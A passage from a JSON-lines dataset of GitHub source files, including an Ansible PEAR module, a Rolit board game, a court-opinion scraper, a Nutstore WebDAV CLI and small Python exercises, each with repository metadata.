Net_URL2\n state: present\n\n# Install pecl package\n- pear:\n name: pecl/json_post\n state: present\n\n# Upgrade package\n- pear:\n name: Net_URL2\n state: latest\n\n# Remove packages\n- pear:\n name: Net_URL2,pecl/json_post\n state: absent\n'''\n\nimport os\n\ndef get_local_version(pear_output):\n \"\"\"Take pear remoteinfo output and get the installed version\"\"\"\n lines = pear_output.split('\\n')\n for line in lines:\n if 'Installed ' in line:\n installed = line.rsplit(None, 1)[-1].strip()\n if installed == '-': continue\n return installed\n return None\n\ndef get_repository_version(pear_output):\n \"\"\"Take pear remote-info output and get the latest version\"\"\"\n lines = pear_output.split('\\n')\n for line in lines:\n if 'Latest ' in line:\n return line.rsplit(None, 1)[-1].strip()\n return None\n\ndef query_package(module, name, state=\"present\"):\n \"\"\"Query the package status in both the local system and the repository.\n Returns a boolean to indicate if the package is installed,\n and a second boolean to indicate if the package is up-to-date.\"\"\"\n if state == \"present\":\n lcmd = \"pear info %s\" % (name)\n lrc, lstdout, lstderr = module.run_command(lcmd, check_rc=False)\n if lrc != 0:\n # package is not installed locally\n return False, False\n\n rcmd = \"pear remote-info %s\" % (name)\n rrc, rstdout, rstderr = module.run_command(rcmd, check_rc=False)\n\n # get the version installed locally (if any)\n lversion = get_local_version(rstdout)\n\n # get the version in the repository\n rversion = get_repository_version(rstdout)\n\n if rrc == 0:\n # Return True to indicate that the package is installed locally,\n # and the result of the version number comparison\n # to determine if the package is up-to-date.\n return True, (lversion == rversion)\n\n return False, False\n\n\ndef remove_packages(module, packages):\n remove_c = 0\n # Using a for loop incase of error, we can report the package that failed\n for package in packages:\n # Query the package first, to see if we even need to remove\n installed, updated = query_package(module, package)\n if not installed:\n continue\n\n cmd = \"pear uninstall %s\" % (package)\n rc, stdout, stderr = module.run_command(cmd, check_rc=False)\n\n if rc 
!= 0:\n module.fail_json(msg=\"failed to remove %s\" % (package))\n\n remove_c += 1\n\n if remove_c > 0:\n\n module.exit_json(changed=True, msg=\"removed %s package(s)\" % remove_c)\n\n module.exit_json(changed=False, msg=\"package(s) already absent\")\n\n\ndef install_packages(module, state, packages):\n install_c = 0\n\n for i, package in enumerate(packages):\n # if the package is installed and state == present\n # or state == latest and is up-to-date then skip\n installed, updated = query_package(module, package)\n if installed and (state == 'present' or (state == 'latest' and updated)):\n continue\n\n if state == 'present':\n command = 'install'\n\n if state == 'latest':\n command = 'upgrade'\n\n cmd = \"pear %s %s\" % (command, package)\n rc, stdout, stderr = module.run_command(cmd, check_rc=False)\n\n if rc != 0:\n module.fail_json(msg=\"failed to install %s\" % (package))\n\n install_c += 1\n\n if install_c > 0:\n module.exit_json(changed=True, msg=\"installed %s package(s)\" % (install_c))\n\n module.exit_json(changed=False, msg=\"package(s) already installed\")\n\n\ndef check_packages(module, packages, state):\n would_be_changed = []\n for package in packages:\n installed, updated = query_package(module, package)\n if ((state in [\"present\", \"latest\"] and not installed) or\n (state == \"absent\" and installed) or\n (state == \"latest\" and not updated)):\n would_be_changed.append(package)\n if would_be_changed:\n if state == \"absent\":\n state = \"removed\"\n module.exit_json(changed=True, msg=\"%s package(s) would be %s\" % (\n len(would_be_changed), state))\n else:\n module.exit_json(change=False, msg=\"package(s) already %s\" % state)\n\n\ndef exe_exists(program):\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if os.path.isfile(exe_file) and os.access(exe_file, os.X_OK):\n return True\n\n return False\n\n\ndef main():\n module = AnsibleModule(\n argument_spec = dict(\n name = dict(aliases=['pkg']),\n state = dict(default='present', choices=['present', 'installed', \"latest\", 'absent', 'removed'])),\n required_one_of = [['name']],\n supports_check_mode = True)\n\n if not exe_exists(\"pear\"):\n module.fail_json(msg=\"cannot find pear executable in PATH\")\n\n p = module.params\n\n # normalize the state parameter\n if p['state'] in ['present', 'installed']:\n p['state'] = 'present'\n elif p['state'] in ['absent', 'removed']:\n p['state'] = 'absent'\n\n if p['name']:\n pkgs = p['name'].split(',')\n\n pkg_files = []\n for i, pkg in enumerate(pkgs):\n pkg_files.append(None)\n\n if module.check_mode:\n check_packages(module, pkgs, p['state'])\n\n if p['state'] in ['present', 'latest']:\n install_packages(module, p['state'], pkgs)\n elif p['state'] == 'absent':\n remove_packages(module, pkgs)\n\n# import module snippets\nfrom ansible.module_utils.basic import *\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible/ansible-modules-extras","sub_path":"packaging/language/pear.py","file_name":"pear.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","stars":944,"dataset":"github-code","pt":"47"} +{"seq_id":"28799827189","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\nimport json\n\n# Add iSDX folder to Python's system path\nisdx_folder = \"iSDX\"\nhome = os.path.expanduser(\"~/\")\nisdx_path = home + isdx_folder\n# isdx = os.path.dirname(\"/home/vagrant/iSDX/\")\nif isdx_path not in sys.path:\n 
sys.path.append(isdx_path)\n\nimport util.log\nfrom access_control import AccessControl\n# Just in case of need in the future\nfrom xctrl.client import RefMonClient # Socket\nfrom lib import Config\nfrom time import sleep\n\n\ndef main():\n # sleep(5) #added a sleep to avoid \"Connection refused\" or \"404\" errors\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', help='the directory of the example')\n args = parser.parse_args()\n\n # locate config file\n base_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)),\"..\",\"examples\",args.dir,\"config\"))\n config_file = os.path.join(base_path, \"sdx_global.cfg\")\n # locate the monitor's flows configuration file\n access_control_flows_file = os.path.join(base_path, \"access_control_flows.cfg\")\n config = Config(config_file)\n \n if os.path.exists(access_control_flows_file):\n with file(access_control_flows_file) as f:\n flows = json.load(f)\n else:\n flows={\"access_control_flows\" : {}}\n\n # start umbrella fabric manager\n logger = util.log.getLogger('access-control')\n logger.info('init')\n\n # Keep it for now just in case we decide to send messages to Refmon\n logger.info('REFMON client: ' + str(config.refmon[\"IP\"]) + ' ' + str(config.refmon[\"Port\"]))\n client = RefMonClient(config.refmon[\"IP\"], config.refmon[\"Port\"], config.refmon[\"key\"])\n\n controller = AccessControl(config, flows, client, logger)\n logger.info('start')\n controller.start()\n\n\nif __name__ == '__main__':\n main()","repo_name":"h2020-endeavour/endeavour","sub_path":"acctrl/acctrl.py","file_name":"acctrl.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"11289005732","text":"\"\"\" Main file responsible for the game organisation\n\"\"\"\n\nimport sys\nfrom time import sleep\nfrom itertools import product\nimport pygame\n\nfrom rolit_game.ui import UI\nfrom rolit_game.popup import Popup\nfrom rolit_game.settings import Settings\nfrom rolit_game.helpers import test_cell_existence, exist_adjacent_cell\nfrom rolit_game.strategies import AI_Strategy, RandomlyPlayStrategy, MiniMaxStrategy\n\nclass Game:\n \"\"\"Main manager for the game\n \"\"\"\n def __init__(self, board_size: int, gamemode: str, ai_level: str):\n self.board_size = board_size\n self.gamemode = gamemode\n self.ai_level = ai_level\n self.ui = UI(self.board_size)\n\n self.board = []\n self.PLAYER1 = Settings.PLAYER1\n self.score1 = 0\n self.PLAYER2 = Settings.PLAYER2\n self.score2 = 0\n self.dead_cell_value = Settings.DEAD_CELL\n\n self.turn = self.PLAYER1\n self.beginner = self.PLAYER1\n\n self.ai_strategy: AI_Strategy\n\n # Time intervall between two actions (making the AI pause between two moves)\n self.SLEEP_TIME = 0.3\n\n self.config()\n\n def play(self):\n \"\"\"Main function of the game\n \"\"\"\n while not self.end_game:\n if self.gamemode == \"AI-AI\":\n sleep(self.SLEEP_TIME)\n cell_pos = self.ai_play()\n if not self.place_coin(cell_pos):\n print('The AI return a non valid cell')\n self.check_changing_colors(cell_pos)\n self.ui.update_diplay(self.board, self.scores)\n self.switch_turn()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n else:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP:\n cell_pos = self.ui.get_nearest_cell()\n # While he/she didn't play in a valid empty cell\n if not self.place_coin(cell_pos):\n break\n self.check_changing_colors(cell_pos)\n 
self.ui.update_diplay(self.board, self.scores)\n self.switch_turn()\n\n if self.gamemode != \"Player-Player\" and not self.end_game:\n sleep(self.SLEEP_TIME)\n cell_pos = self.ai_play()\n if not self.place_coin(cell_pos):\n print('The AI return a non valid cell')\n self.check_changing_colors(cell_pos)\n self.ui.update_diplay(self.board, self.scores)\n\n self.switch_turn()\n if event.type == pygame.QUIT:\n sys.exit()\n\n self.score1, self.score2 = self.scores\n sleep(self.SLEEP_TIME)\n\n need_to_save_score = self.gamemode == \"Player-AI\" and self.board_size == 5\n play_again = Popup.display_score(self.score1, self.score2, self.ai_level, need_to_save_score)\n\n # If the player want to play again\n if play_again:\n # Initialize the new game with the old configuration\n self.config()\n\n # If its a game with AI -> The beginner of the game change,\n # The AI play one turn and the play function is called\n if self.gamemode != \"Player-Player\":\n if self.beginner == self.PLAYER1:\n self.beginner = self.PLAYER2\n #back to green\n self.switch_turn()\n self.place_coin(self.ai_play())\n self.check_changing_colors(cell_pos)\n #back to red\n self.switch_turn()\n else:\n self.beginner = self.PLAYER1\n #Back to red\n self.switch_turn()\n\n self.play()\n\n def config(self):\n \"\"\"Load the default board and display it\n \"\"\"\n # Reseting values\n self.board.clear()\n self._init_board_lists()\n\n # Placing some dark coins to allow the game to be fair\n self._place_dead_cells(self.turn)\n self.ui.update_ui()\n\n self.score1 = 0\n self.score2 = 0\n\n if self.gamemode != \"Player-Player\":\n self.ai_strategy = self.get_ai_strategy(self.ai_level, self.PLAYER2, self.PLAYER1)\n if self.gamemode == \"AI-AI\":\n strat2 = self.get_ai_strategy(self.ai_level, self.PLAYER1, self.PLAYER2)\n self.ai_strategy = (strat2, self.ai_strategy)\n print(self.ai_strategy)\n\n @classmethod\n def get_ai_strategy(cls, ai_level: str, player: int, opponent: int):\n \"\"\"Get specific strategy following the given level\"\"\"\n if ai_level == \"Easy\":\n return RandomlyPlayStrategy()\n return MiniMaxStrategy(ai_level, player, opponent)\n\n def _init_board_lists(self):\n \"\"\"Fill the board with zeros\n \"\"\"\n for i in range(self.board_size):\n self.board.append([])\n [self.board[i].append(0) for y in range(self.board_size)]\n\n def _place_dead_cells(self, old_turn: int):\n \"\"\"Place a black cell which allow the game to be fair\n \"\"\"\n self.turn = self.dead_cell_value\n list_dead_cells = [(2, 2)] if self.board_size == 5 else [(4, 4), (3, 3)]\n for pos in list_dead_cells:\n cell_pos = self.ui.pos_from_cell_index(pos)\n self.place_coin(cell_pos, True)\n self.turn = old_turn\n\n def place_coin(self, cell_pos: tuple, first_cells=None) -> bool:\n \"\"\"Place a coin in a valid cell\n \"\"\"\n if first_cells is None:\n first_cells = False\n i, j = self.ui.cell_index_from_pos(cell_pos)\n if first_cells or exist_adjacent_cell(self.board, (i, j)):\n if self.board[i][j] == 0:\n if self.turn == self.PLAYER1:\n self.ui.add_coin_img(self.ui.red_coin, cell_pos)\n self.board[i][j] = self.turn\n elif self.turn == self.PLAYER2:\n self.ui.add_coin_img(self.ui.green_coin, cell_pos)\n self.board[i][j] = self.turn\n else:\n self.ui.add_coin_img(self.ui.dead_cell, cell_pos)\n self.board[i][j] = self.dead_cell_value\n # print('Cell placed - Coords : {} , {} by {}'.format(i,j,self.turn))\n return True\n # TODO : Add specific error ?\n print('Cell already full {} - Coords : {} , {}'.format(self.turn, i, j))\n if self.gamemode == \"Player-Player\":\n 
Popup.place_near_coin()\n return False\n\n def ai_play(self) -> tuple:\n \"\"\" Play randomly on an empty cell near an other coin\n \"\"\"\n if self.gamemode == \"AI-AI\":\n # Considering player1 = 1 and player2 = 2\n cell_index = self.ai_strategy[self.turn-1].play(self.board)\n else:\n cell_index = self.ai_strategy.play(self.board)\n inversed_cell_pos = self.ui.pos_from_cell_index(cell_index)\n cell_pos = (inversed_cell_pos[1], inversed_cell_pos[0])\n\n return cell_pos\n\n def check_changing_colors(self, cell_pos: tuple):\n \"\"\"Roll all coins wich need to change since the last move\n \"\"\"\n index_initial_cell_filled = self.ui.cell_index_from_pos(cell_pos)\n\n # get the eight coordinates to add from (-1,-1) to (1,1)\n possible_line_directions = list(filter(lambda x: x[0] != 0 or x[1] != 0, list(product(range(-1, 2), range(-1, 2)))))\n\n for coord_couple in possible_line_directions:\n stack = []\n roll_needed = False\n while True:\n # Each tme we check line by line if each cell is empty or\n # full with the same color of the coin placed\n i = index_initial_cell_filled[0] + coord_couple[0]*(len(stack) + 1)\n j = index_initial_cell_filled[1] + coord_couple[1]*(len(stack) + 1)\n\n #If the cell doesn't exist or if it's empty we stop searching on the specific line\n if not test_cell_existence(self.board, i, j) or self.board[i][j] == 0:\n break\n\n #If the cell is fill with a coin with the same color of the placed one we stop searching\n #(Following to the rules no other cells need to be rolled on the line)\n if self.board[i][j] == self.turn:\n roll_needed = True\n break\n\n stack.append((i, j))\n\n if roll_needed:\n sleep(self.SLEEP_TIME)\n [self.roll(index) for index in stack]\n\n def switch_turn(self):\n \"\"\"Let the other player play\n \"\"\"\n self.turn = self.PLAYER1 if self.turn == self.PLAYER2 else self.PLAYER2\n\n @property\n def scores(self) -> tuple:\n \"\"\"Get the score of each player\n \"\"\"\n return (\n sum([line.count(self.PLAYER1) for line in self.board]),\n sum([line.count(self.PLAYER2) for line in self.board])\n )\n\n @property\n def end_game(self) -> bool:\n \"\"\" Define whether a game is ended or not\n By returning if all the numbers are equal to 0\n \"\"\"\n return all((all(row) for row in self.board))\n\n def roll(self, cell_index: tuple):\n \"\"\"Roll a cell to the color of the other player\n \"\"\"\n i, j = cell_index\n cell_pos = self.ui.pos_from_cell_index((j, i))\n\n #Place the correspoding colored coin\n self.ui.add_coin_img(self.ui.red_coin, cell_pos) \\\n if self.turn == self.PLAYER1 else self.ui.add_coin_img(self.ui.green_coin, cell_pos)\n self.board[cell_index[0]][cell_index[1]] = self.turn\n sleep(self.SLEEP_TIME)\n","repo_name":"s-rigaud/Rolit","sub_path":"rolit_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26083344135","text":"import random\r\nrock = ('''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n''')\r\n\r\npaper = ('''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n''')\r\n\r\nscissors = ('''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n''')\r\nuser = int(input(\"What do you choose? 
Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\r\n\r\nif (user==0):\r\n print(rock)\r\nelif (user==1):\r\n print(paper)\r\nelif (user==2):\r\n print(scissors)\r\n\r\n \r\n\r\ncomputer = random.randint(0,2)\r\nprint(\"Computer choose\")\r\nif (computer==0):\r\n print(rock)\r\nelif (computer==1):\r\n print(paper)\r\nelif (computer==2):\r\n print(scissors)\r\n \r\nif user>=3 or user<0:\r\n print(\"You chose an invalid number!!\")\r\nelif user==0 and computer ==2:\r\n print(\"You win!!\")\r\nelif computer==0 and user==2:\r\n print(\"You lose\")\r\nelif computer>user:\r\n print(\"You lose\")\r\nelif user>computer:\r\n print(\"You win!!\")\r\nelif computer==user:\r\n print(\"It's a draw\")\r\n \r\n \r\n\r\n \r\n \r\n\r\n","repo_name":"shivani8305/python-pro","sub_path":"Python pro/py4.py","file_name":"py4.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17857864829","text":"# Scraper for Iowa Supreme Court\r\n# CourtID: iowa\r\n# Court Short Name: iowa\r\n# Author: Andrei Chelaru\r\n# Reviewer: mlr\r\n# Date created: 25 July 2014\r\n\r\n\r\nfrom datetime import date\r\nimport time\r\nfrom lxml import html\r\nimport requests\r\nimport re\r\n\r\nfrom juriscraper.OpinionSite import OpinionSite\r\nfrom juriscraper.lib.string_utils import titlecase\r\n\r\n\r\nclass Site(OpinionSite):\r\n def __init__(self):\r\n super(Site, self).__init__()\r\n self.court_id = self.__module__\r\n self.year = date.today().year\r\n self.url = 'http://www.iowacourts.gov/About_the_Courts/Supreme_Court/Supreme_Court_Opinions/Opinions_Archive/index.asp'\r\n\r\n def _download(self, request_dict={}):\r\n if self.method == 'LOCAL':\r\n # Note that this is returning a list of HTML trees.\r\n html_trees = [super(Site, self)._download(request_dict=request_dict)]\r\n else:\r\n html_l = OpinionSite._download(self)\r\n s = requests.session()\r\n html_trees = []\r\n for url in html_l.xpath(\"//td[@width='49%']//tr[contains(., ', {year}')]/td[5]/a/@href\".format(year=self.year)):\r\n r = s.get(url,\r\n headers={'User-Agent': 'Juriscraper'},\r\n **request_dict)\r\n r.raise_for_status()\r\n\r\n # If the encoding is iso-8859-1, switch it to cp1252 (a\r\n # superset)\r\n if r.encoding == 'ISO-8859-1':\r\n r.encoding = 'cp1252'\r\n\r\n # Grab the content\r\n text = self._clean_text(r.text)\r\n html_tree = html.fromstring(text)\r\n html_tree.make_links_absolute(self.url)\r\n\r\n remove_anchors = lambda url: url.split('#')[0]\r\n html_tree.rewrite_links(remove_anchors)\r\n html_trees.append(html_tree)\r\n return html_trees\r\n\r\n def _get_case_names(self):\r\n case_names = []\r\n for html_tree in self.html:\r\n case_names.extend(self._return_case_names(html_tree))\r\n return case_names\r\n\r\n @staticmethod\r\n def _return_case_names(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/text()\"\r\n return [titlecase(s.strip().lower()) for s in html_tree.xpath(path)]\r\n\r\n def _get_download_urls(self):\r\n download_urls = []\r\n for html_tree in self.html:\r\n download_urls.extend(self._return_download_urls(html_tree))\r\n return download_urls\r\n\r\n @staticmethod\r\n def _return_download_urls(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/preceding::tr[2]/td[1]/a/@href\"\r\n return list(html_tree.xpath(path))\r\n\r\n def _get_case_dates(self):\r\n case_dates = []\r\n for html_tree in self.html:\r\n case_dates.extend(self._return_dates(html_tree))\r\n return case_dates\r\n\r\n 
@staticmethod\r\n def _return_dates(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfHeader') and not(contains(., 'Iowa'))]/text()\"\r\n dates = []\r\n text = html_tree.xpath(path)[0]\r\n case_date = date.fromtimestamp(time.mktime(time.strptime(text.strip(), '%B %d, %Y')))\r\n dates.extend([case_date] * int(html_tree.xpath(\"count(//*[contains(concat(' ',@id,' '),' wfLabel')])\")))\r\n return dates\r\n\r\n def _get_precedential_statuses(self):\r\n return ['Published'] * len(self.case_dates)\r\n\r\n def _get_docket_numbers(self):\r\n docket_numbers = []\r\n for html_tree in self.html:\r\n docket_numbers.extend(self._return_docket_numbers(html_tree))\r\n return docket_numbers\r\n\r\n @staticmethod\r\n def _return_docket_numbers(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/preceding::tr[2]/td[1]/a/text()\"\r\n return [re.sub('Nos?.', '', e).strip() for e in html_tree.xpath(path)]\r\n","repo_name":"brianwc/juriscraper","sub_path":"opinions/united_states/state/iowa.py","file_name":"iowa.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"25413649659","text":"\"\"\"\nGiven a cell with \"it's a fib sequence\" from slideshow,\n please write function \"check_fib\",\n which accepts a Sequence of integers, and\n returns if the given sequence is a Fibonacci sequence\nWe guarantee, that the given sequence contain >= 0 integers inside.\n\"\"\"\nfrom collections.abc import Sequence\nfrom math import sqrt\n\n\ndef check_fibonacci1(data: Sequence[int]) -> bool:\n \"\"\"\n normal way to check fib sequence\n \"\"\"\n res = True\n num_1 = 0\n num_2 = 1\n while data[0] > num_1:\n num_1, num_2 = num_2, num_1 + num_2\n for i, item in enumerate(data):\n if item != num_1:\n res = False\n break\n num_1, num_2 = num_2, num_1 + num_2\n\n return res\n\n\ndef _binet_formula(n: int) -> int:\n return int((((1 + sqrt(5)) / 2) ** n - ((1 - sqrt(5)) / 2) ** n) / sqrt(5))\n\n\ndef check_fibonacci2(data: Sequence[int]) -> bool:\n \"\"\"\n I was curious if this works\n \"\"\"\n res = True\n for i, item in enumerate(data):\n if item != int(_binet_formula(i)):\n res = False\n break\n return res\n","repo_name":"adlerberg0/EPAM-training","sub_path":"hw1/task2/check_fib.py","file_name":"check_fib.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38506867037","text":"i=0\r\nwhile i<5:\r\n print(i+1)\r\n i = i+1\r\n\r\nj=0\r\nwhile j<5:\r\n print(\"Arjun singh\")\r\n j=j+1\r\n\r\nk=5\r\nwhile k>=0:\r\n print(k)\r\n k = k-1\r\nelse:\r\n print(\"I am inside else\")\r\n \r\n\r\n","repo_name":"ArjunSinghShekhawat/Python","sub_path":"whileLoop.py","file_name":"whileLoop.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31256023065","text":"import argparse\nimport os\nfrom OXFORD import OXFORDMaker\n\n\nparser = argparse.ArgumentParser(description='Make dataset TFRecord file')\nparser.add_argument('--img_dir', type=str, required=True,\n help='jpg images directory path')\nparser.add_argument('--label_dir', type=str, required=True,\n help='png labels directory path')\nparser.add_argument('--train_txt', type=str, required=True,\n help='train.txt file path')\nparser.add_argument('--val_txt', type=str, required=True,\n help='val.txt file path')\nparser.add_argument('--shuffle', type=bool, 
default=False)\nparser.add_argument('--save_dir', type=str, default='./tfrecords/', help='the directory path to saved tfrecord')\n\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n maker = OXFORDMaker(args.img_dir, args.label_dir, args.train_txt, args.val_txt, args.shuffle)\n\n # train dataset\n save_path = os.path.join(args.save_dir, 'train_OXFORD.tfrecord')\n maker.make_tfrecord(save_path, 'train')\n\n # val dataset\n save_path = os.path.join(args.save_dir, 'val_OXFORD.tfrecord')\n maker.make_tfrecord(save_path, 'val')\n","repo_name":"kwjinwoo/HRNet","sub_path":"segmentation/dataset/dataset_make.py","file_name":"dataset_make.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"378371253","text":"# encoding: utf-8\nimport re\nfrom collections import OrderedDict\nfrom os import path\nfrom itertools import ifilter\nfrom urllib import unquote\n\nimport click\nimport tabulate\nfrom dateutil.parser import parse as dt_parse\nfrom dateutil import tz\nfrom parsimonious import ParseError\nfrom parsimonious.grammar import Grammar\nfrom parsimonious.nodes import NodeVisitor\n\nfrom nutstore_cli.utils import output, humanbytes, to_str\nfrom nutstore_cli.command_help import help_table\nfrom nutstore_cli.client.exceptions import WebdavException\n\nCOMMANDS = ['cd', 'download', 'exit', 'grep', 'help', 'ls', 'll', 'rm', 'upload']\n\nRULES = r\"\"\"\n command = cd / ls / exit / help / download / upload / rm\n\n rm = \"rm\" _ string\n upload = \"upload\" _ string\n download = \"download\" _ string _ (string)?\n help = \"help\" / \"h\" / \"?\"\n exit = \"exit\" / \"quit\" / \"q\"\n ls = (\"ls\" / \"ll\") _ (grep)?\n cd = _ \"cd\" _ string _\n \n grep = pipe _ \"grep\" _ ex_string\n \n pipe = \"|\"\n\n ex_string = string / \"*\" / \"-\" / \"_\" / \".\"\n string = char+\n char = ~r\"[^\\s'\\\\]\"\n _ = ~r\"\\s*\"\n\"\"\"\n\ngrammar = Grammar(RULES)\n\n\nclass PrettyFile(object):\n def __init__(self, efile):\n \"\"\"\n :type efile: easywebdav.client.File\n \"\"\"\n self._file = efile\n self._name = unquote(path.basename(efile.name)).decode('utf-8')\n\n self.is_dir = efile.contenttype == 'httpd/unix-directory'\n self.name = self._name\n self.size = humanbytes(int(efile.size))\n self.modify_time = dt_parse(efile.mtime).astimezone(tz.tzlocal()).strftime('%Y-%m-%d %H:%M:%S')\n if self.is_dir:\n self.name = click.style(self._name, fg='cyan')\n self.size = ''\n\n def pack(self):\n return self.name, self.size, self.modify_time\n\n\nclass ExecutionVisitor(NodeVisitor):\n unwrapped_exceptions = (WebdavException,)\n\n def __init__(self, context):\n \"\"\"\n :type context: nutstore_cli.cli.Context\n \"\"\"\n super(ExecutionVisitor, self).__init__()\n self.context = context\n\n def visit_cd(self, node, children):\n path = children[3].text\n self.context.client.cd(to_str(path))\n\n def visit_exit(self, node, children):\n self.context.should_exit = True\n\n def visit_ls(self, node, children):\n pretty_files = [PrettyFile(ef) for ef in self.context.client.ls()]\n grep_keywords = children[2].children[4].children[0].text if children[2].children else None\n if grep_keywords:\n output.debug('Issue a grep \"{}\"'.format(grep_keywords))\n pretty_files = ifilter(lambda pfile: re.search(grep_keywords, pfile._name, flags=re.IGNORECASE),\n pretty_files)\n pretty_files = ifilter(lambda pfile: bool(pfile._name), pretty_files) # ignore who has a empty filename\n pretty_files = sorted(pretty_files, key=lambda pfile: 
pfile.modify_time)\n output.echo(tabulate.tabulate(\n [pfile.pack() for pfile in pretty_files],\n headers=['Filename', 'Size', 'Modify Time']\n ))\n\n def visit_download(self, node, children):\n cloud_path = children[2].text\n store_path = children[4].text if len(node.children) == 5 else None\n dest = self.context.client.download(to_str(cloud_path), to_str(store_path))\n output.echo(dest)\n\n def visit_upload(self, node, children):\n local_path = to_str(children[2].text)\n remote_path = self.context.client.upload(local_path)\n output.echo(remote_path)\n\n def visit_rm(self, node, children):\n cloud_path = to_str(children[2].text)\n if click.confirm('rm {}?'.format(cloud_path)):\n self.context.client.rm(cloud_path)\n\n def visit_help(self, node, children):\n output.info(help_table)\n\n def generic_visit(self, node, children):\n if (not node.expr_name) and node.children:\n if len(children) == 1:\n return children[0]\n return children\n return node\n\n\ndef execute(command, context):\n if not command.strip():\n return\n\n visitor = ExecutionVisitor(context)\n try:\n root = grammar.parse(command)\n except ParseError:\n output.error('Invalid command \"{0}\".'.format(command))\n output.info('Type \"help\" to see supported commands.')\n return\n\n try:\n visitor.visit(root)\n except WebdavException as e:\n output.error(str(e))\n","repo_name":"Kxrr/nutstore-cli","sub_path":"nutstore_cli/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"47"} +{"seq_id":"17012507973","text":"## Bouncing Ball\r\n##\r\n## Just as printing \"Hello World\" is the standard first\r\n## example completed in a new programming language, games\r\n## packages are usually introduced with a \"Bouncing Ball\"\r\n## demonstration in which a ball bounces around\r\n## the screen. Turtle graphics is not designed for\r\n## creating games, but we can still produce a convincing\r\n## bouncing ball simulation.\r\n##\r\n## The incomplete program below creates a black window and\r\n## makes the cursor look like a beachball. (Make sure the\r\n## file 'beachball.gif' is in the same folder as this\r\n## program.)\r\n##\r\n## Your job is to make the ball bounce realistically around\r\n## the walls. Use the following strategy.\r\n##\r\n## 1. Set up the window size to a known value so that you\r\n## know the maximum x and y coordinates (i.e., where the\r\n## borders are)\r\n## 2. Lift the pen, because we don't want to leave a trail\r\n## 3. For each of a large range of \"bounces\":\r\n## a. Choose a random position on the top border\r\n## b. Move the cursor to that position\r\n## c. Choose a random position on the left border\r\n## d. Move the cursor to that position\r\n## e. Choose a random position on the bottom border\r\n## f. Move the cursor to that position\r\n## g. Choose a random position on the right border\r\n## h. 
Move the cursor to that position\r\n##\r\n## Experiment with different ways of choosing the random\r\n## positions to get the most realistic bouncing effect.\r\n## (We found that it's best to keep the ball away from\r\n## the corners.)\r\n\r\n# Import the functions required\r\nfrom turtle import *\r\nfrom random import randint\r\n\r\n# Set up the playing field\r\nsetup()\r\ntitle('Bouncing Ball')\r\nbgcolor('black')\r\n\r\n# Create the ball's image from a file\r\nregister_shape('beachball.gif')\r\nshape('beachball.gif') # make the turtle look like a ball\r\n\r\n# Set the drawing speed, if necessary\r\nspeed('slow')\r\n\r\n# Fix the window's size so that we know where the borders are\r\nmax_coord =300 # pixels\r\nsetup(max_coord * 2, max_coord * 2)\r\n\r\n# Lift the pen, so that we don't leave a trail\r\npenup()\r\n\r\n# Limit how far we can get from the middle of the wall\r\ndist_from_middle = max_coord / 2\r\n\r\n# Bounce off of each of the four walls multiple times,\r\n# keeping the ball away from the corners\r\nfor bounce_num in range(30):\r\n goto(randint(-dist_from_middle, dist_from_middle), max_coord) # Top border,\r\n goto(-max_coord, randint(-dist_from_middle, dist_from_middle)) # Left border\r\n goto(randint(-dist_from_middle, dist_from_middle), -max_coord) # Bottom border\r\n goto(max_coord, randint(-dist_from_middle, dist_from_middle)) # Right border\r\n\r\n# Comment: Turtle is mainly a drawing package, so its ability\r\n# to support games and simulations is limited. If you're keen\r\n# on these kinds of animations we suggest you look online for the\r\n# PyGame package which can be used to create \"real\" games in\r\n# Python.\r\n\r\n# Exit gracefully\r\ndone()\r\n\r\n \r\n","repo_name":"ARWA-ALraddadi/python-tutorial-for-beginners","sub_path":"02-Workshop/Workshop-Solutions/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16091142622","text":"from tastypie.resources import ModelResource\nfrom exampleapp.models import Persons , State\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\n\nclass StateResource(ModelResource):\n class Meta:\n queryset=State.objects.all()\n resource_name = 'State'\n authorization= Authorization()\n always_return_data = True\n \nclass PersonResource(ModelResource):\n state = 